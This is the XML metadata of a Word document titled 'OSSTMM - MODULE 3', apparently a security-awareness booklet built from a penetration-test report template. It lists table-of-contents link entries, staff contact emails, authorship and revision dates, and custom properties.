      </vt:variant>
      <vt:variant>
        <vt:i4>1048629</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>218</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176364</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048629</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>212</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176363</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048629</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>206</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176362</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048629</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>200</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176361</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048629</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>194</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176360</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245237</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>188</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176359</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245237</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>182</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176358</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245237</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>176</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176357</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245237</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>170</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176356</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245237</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>164</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176355</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245237</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>158</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176354</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245237</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>152</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176353</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245237</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>146</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176352</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245237</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>140</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176351</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1245237</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>134</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176350</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179701</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>128</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176349</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179701</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>122</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176348</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179701</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>116</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176347</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179701</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>110</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176346</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179701</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>104</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176345</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179701</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>98</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176344</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179701</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>92</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176343</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179701</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>86</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176342</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179701</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>80</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176341</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179701</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>74</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176340</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376309</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>68</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176339</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376309</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>62</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176338</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376309</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>56</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176337</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376309</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>50</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176336</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376309</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>44</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176335</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376309</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>38</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176334</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376309</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>32</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176333</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376309</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>26</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176332</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376309</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>20</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176331</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376309</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>14</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc263176330</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507437</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>9</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>mailto:damien.gitter@telindus.lu</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5570599</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>6</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>mailto:joany.boutet@telindus.lu</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5046310</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>3</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>mailto:olivier.medoc@telindus.lu</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7077906</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>mailto:stephane.lhermitte@telindus.lu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OSSTMM - MODULE 3</dc:title>
  <dc:creator>Bruno RUBIN</dc:creator>
  <cp:lastModifiedBy>GITTER Damien</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <cp:lastPrinted>2018-06-20T15:33:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-02T16:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-03T11:45:00Z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Fusion For Energy</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="TEMPLATE_FILEPATH">
    <vt:lpwstr>\\tlu1fp02\departs\SAGS\interne\Pentest\Templates-Reports\Pentest-TechnicalReport-EN-v4.dotm</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Contact">
    <vt:lpwstr>Tom LECLERC - Bruno RUBIN</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Sensitivity">
    <vt:lpwstr>Confidential</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="TEMPLATE_AUTOTEXT">
    <vt:lpwstr>Z:\PM et Méthodologies\Templates\Templates-Reports\TelindusAutotexts-v0.5.docx</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="_NewReviewCycle">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="_AdHocReviewCycleID">
    <vt:i4>-1114349955</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="_EmailSubject">
    <vt:lpwstr>Advanced Security Awareness booklet</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="_AuthorEmail">
    <vt:lpwstr>Bruno.RUBIN@telindus.lu</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="_AuthorEmailDisplayName">
    <vt:lpwstr>RUBIN Bruno</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="_ReviewingToolsShownOnce">
    <vt:lpwstr/>
  </property>
</Properties>
</file>